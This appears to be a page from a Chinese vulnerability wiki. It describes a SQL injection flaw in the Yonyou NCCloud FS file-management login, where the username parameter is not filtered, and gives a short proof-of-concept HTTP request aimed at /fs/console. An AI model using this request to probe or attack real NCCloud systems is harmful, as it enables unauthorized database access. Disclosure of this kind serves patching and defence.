menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right Vulnerability-棱角社区(Vulnerability)项目漏洞-20210715 chevron_right 用友 NCCloud FS文件管理SQL注入.md
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    用友 NCCloud FS文件管理SQL注入.md
    338 B / 2021-05-21 09:14:38
        # 用友 NCCloud FS文件管理SQL注入

用友 NCCloud FS文件管理登录页面对用户名参数没有过滤,存在SQL注入.

poc:

```
GET /fs/console?username=123&password=%2F7Go4Iv2Xqlml0WjkQvrvzX%2FgBopF8XnfWPUk69fZs0%3D HTTP/1.1
Host: 
...
//登录处username参数
```

from:https://mp.weixin.qq.com/s/jb7XeLGvdyNrF1xQFsXDjA
    links
    file_download